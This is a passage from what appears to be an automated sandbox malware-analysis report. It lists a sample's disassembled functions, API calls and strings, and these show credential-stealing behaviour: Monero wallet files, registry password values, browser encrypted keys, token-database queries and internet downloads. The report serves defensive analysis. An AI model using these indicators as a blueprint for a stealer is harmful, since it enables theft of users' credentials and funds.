                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: b76c7a915d84224ba0dea81f90244e71e202204dd7846435ef3dcf970928798e
                              • Instruction ID: f6ae6f01a46bb9f2bc118d59b348885a4c6790713c694d317418d6b1bd8304ad
                              • Opcode Fuzzy Hash: b76c7a915d84224ba0dea81f90244e71e202204dd7846435ef3dcf970928798e
                              • Instruction Fuzzy Hash: 6F512D7891010CABCB54FF61C996FED7779AF10308F50401EE80A5A592DF386B56CB7A
                              Function 004C12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 8fbbdc85234eaaacc4baccbf640e3998310204df27edf8c7fe6556f2f5fa6359
                              • Instruction ID: bf164e143e3f429c68c9a8da9c0106874490f0629d66d0c50d8737bcf8544682
                              • Opcode Fuzzy Hash: 8fbbdc85234eaaacc4baccbf640e3998310204df27edf8c7fe6556f2f5fa6359
                              • Instruction Fuzzy Hash: 7BC1B5B990020D9BCB54EF60DC89FEA7379BB54308F00459EF10AA7251DA74EA85CFA5
                              Function 004C4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 004C42EC
                              • lstrcat.KERNEL32(?,0118DF98), ref: 004C430B
                              • lstrcat.KERNEL32(?,?), ref: 004C431F
                              • lstrcat.KERNEL32(?,0118C7B0), ref: 004C4333
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004C8D90: GetFileAttributesA.KERNEL32(00000000,?,004B1B54,?,?,004D564C,?,?,004D0E1F), ref: 004C8D9F
                                • Part of subcall function 004B9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004B9D39
                                • Part of subcall function 004B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004B99EC
                                • Part of subcall function 004B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004B9A11
                                • Part of subcall function 004B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004B9A31
                                • Part of subcall function 004B99C0: ReadFile.KERNEL32(000000FF,?,00000000,004B148F,00000000), ref: 004B9A5A
                                • Part of subcall function 004B99C0: LocalFree.KERNEL32(004B148F), ref: 004B9A90
                                • Part of subcall function 004B99C0: CloseHandle.KERNEL32(000000FF), ref: 004B9A9A
                                • Part of subcall function 004C93C0: GlobalAlloc.KERNEL32(00000000,004C43DD,004C43DD), ref: 004C93D3
                              • StrStrA.SHLWAPI(?,0118DF08), ref: 004C43F3
                              • GlobalFree.KERNEL32(?), ref: 004C4512
                                • Part of subcall function 004B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NK,00000000,00000000), ref: 004B9AEF
                                • Part of subcall function 004B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,004B4EEE,00000000,?), ref: 004B9B01
                                • Part of subcall function 004B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NK,00000000,00000000), ref: 004B9B2A
                                • Part of subcall function 004B9AC0: LocalFree.KERNEL32(?,?,?,?,004B4EEE,00000000,?), ref: 004B9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 004C44A3
                              • StrCmpCA.SHLWAPI(?,004D08D1), ref: 004C44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004C44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 004C44E5
                              • lstrcat.KERNEL32(00000000,004D0FB8), ref: 004C44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 8adff53ac4f1f7018983eeeb273f972567e1ab91350fd6c3da66d09c45bbcd62
                              • Instruction ID: 53d94102fc41c5698d396b72f6fa7d0929ef71db291e606a89053a3f1d623994
                              • Opcode Fuzzy Hash: 8adff53ac4f1f7018983eeeb273f972567e1ab91350fd6c3da66d09c45bbcd62
                              • Instruction Fuzzy Hash: C27194B6900208BBCB54EBE0DC95FEE7379AB88304F00459DF60997181EA78DB55CFA5
                              Function 004B1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004B12B4
                                • Part of subcall function 004B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 004B12BB
                                • Part of subcall function 004B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004B12D7
                                • Part of subcall function 004B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004B12F5
                                • Part of subcall function 004B12A0: RegCloseKey.ADVAPI32(?), ref: 004B12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 004B134F
                              • lstrlen.KERNEL32(?), ref: 004B135C
                              • lstrcat.KERNEL32(?,.keys), ref: 004B1377
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004C8B60: GetSystemTime.KERNEL32(004D0E1A,0118CF88,004D05AE,?,?,004B13F9,?,0000001A,004D0E1A,00000000,?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004C8B86
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004B1465
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004B99EC
                                • Part of subcall function 004B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004B9A11
                                • Part of subcall function 004B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004B9A31
                                • Part of subcall function 004B99C0: ReadFile.KERNEL32(000000FF,?,00000000,004B148F,00000000), ref: 004B9A5A
                                • Part of subcall function 004B99C0: LocalFree.KERNEL32(004B148F), ref: 004B9A90
                                • Part of subcall function 004B99C0: CloseHandle.KERNEL32(000000FF), ref: 004B9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 004B14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 3f19a4ab73034de17e1db9ca62bc9cc6002c66dc2c4c97f36725ec6eac4a00e6
                              • Instruction ID: 1e5103ef90395cdb68b36111575ae44f012af89d3d819b43c2b420655df14db2
                              • Opcode Fuzzy Hash: 3f19a4ab73034de17e1db9ca62bc9cc6002c66dc2c4c97f36725ec6eac4a00e6
                              • Instruction Fuzzy Hash: 095152B5D1011857CB55FB61DC92FED733CAB50308F4045AEB20A62091EE386B99CAAA
                              Function 004B75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004B72D0: memset.MSVCRT ref: 004B7314
                                • Part of subcall function 004B72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004B733A
                                • Part of subcall function 004B72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004B73B1
                                • Part of subcall function 004B72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004B740D
                                • Part of subcall function 004B72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 004B7452
                                • Part of subcall function 004B72D0: HeapFree.KERNEL32(00000000), ref: 004B7459
                              • lstrcat.KERNEL32(00000000,004D17FC), ref: 004B7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004B7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 004B765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004B768F
                              • lstrcat.KERNEL32(00000000,004D1804), ref: 004B76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004B76D3
                              • lstrcat.KERNEL32(00000000,004D1808), ref: 004B76ED
                              • task.LIBCPMTD ref: 004B76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: :
                              • API String ID: 3191641157-3653984579
                              • Opcode ID: f5b19e8b4922bd11d7bf78324c6945dfe499c4330f3d34658073985d552c27be
                              • Instruction ID: 85b541111b5956221a48c51e85652a242759ac3798d0f58714248abfa2f9faf1
                              • Opcode Fuzzy Hash: f5b19e8b4922bd11d7bf78324c6945dfe499c4330f3d34658073985d552c27be
                              • Instruction Fuzzy Hash: 09315EB1A00109EFCB04EBE5DC95DFE7379BB44305B14511EF116A7390DA38A946CB66
                              Function 004B72D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 004B7314
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004B733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004B73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004B740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004B7452
                              • HeapFree.KERNEL32(00000000), ref: 004B7459
                              • task.LIBCPMTD ref: 004B7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: Password
                              • API String ID: 2808661185-3434357891
                              • Opcode ID: a9aded0a3d36ab212c962fc671f22d3ca0f057dd4a107deae2da50684041a826
                              • Instruction ID: 4e967f3e23fd3e4105d90cd003c5337d6b45c5a52915b80a952ae7745dac4878
                              • Opcode Fuzzy Hash: a9aded0a3d36ab212c962fc671f22d3ca0f057dd4a107deae2da50684041a826
                              • Instruction Fuzzy Hash: 87613BB58001289BDB24DB50CC41BEAB7BCBF44344F0081EAE649A6241DBB46FC9CFA5
                              Function 004B60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004B4839
                                • Part of subcall function 004B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004B4849
                              • InternetOpenA.WININET(004D0DF7,00000001,00000000,00000000,00000000), ref: 004B610F
                              • StrCmpCA.SHLWAPI(?,0118E2D0), ref: 004B6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004B618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004B61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 004B61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004B620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 004B6249
                              • InternetCloseHandle.WININET(?), ref: 004B6253
                              • InternetCloseHandle.WININET(00000000), ref: 004B6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: a218017d88eec61754ccc6661665c98ed503cd1f34b24259aaf3c2a7aac2c940
                              • Instruction ID: a88b5a8fc87f9783171c583a81236e5b7be6b178e47a1da4be469d91ab02ea5a
                              • Opcode Fuzzy Hash: a218017d88eec61754ccc6661665c98ed503cd1f34b24259aaf3c2a7aac2c940
                              • Instruction Fuzzy Hash: E15184B5900208ABDF24EF91DC45FEE77B9FB44705F104099B609A71C0DB786A85CFAA
                              Function 004BBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                              • lstrlen.KERNEL32(00000000), ref: 004BBC9F
                                • Part of subcall function 004C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004C8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 004BBCCD
                              • lstrlen.KERNEL32(00000000), ref: 004BBDA5
                              • lstrlen.KERNEL32(00000000), ref: 004BBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: ae493ebf0589e958bf730122ee43530718a735161c142abf131e3228dbc0c098
                              • Instruction ID: 08ab90bb54cd4520e274e2423f2a2ea0b67570d7a26666c713d9d3d700c1c241
                              • Opcode Fuzzy Hash: ae493ebf0589e958bf730122ee43530718a735161c142abf131e3228dbc0c098
                              • Instruction Fuzzy Hash: BFB172B591010CABDB44FBA1DC56FEE7338AF14308F40451EF506A2191EF386A59CBBA
                              Function 004C6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: e87684709b634dfc0a2590ed99ebbd72d9c0ca83ad85d0ff44032cc6309320dc
                              • Instruction ID: 9fd1862f587a31df10d69fad3a702183e27ec91c6b676f890a1f9133ed72ceb1
                              • Opcode Fuzzy Hash: e87684709b634dfc0a2590ed99ebbd72d9c0ca83ad85d0ff44032cc6309320dc
                              • Instruction Fuzzy Hash: 00F03A74905209EFD384AFE0A909F3C7B71FB05702F04419DE60986290D6745A51DBD6
                              Function 004B4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004B4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004B4FD1
                              • InternetOpenA.WININET(004D0DDF,00000000,00000000,00000000,00000000), ref: 004B4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 004B5011
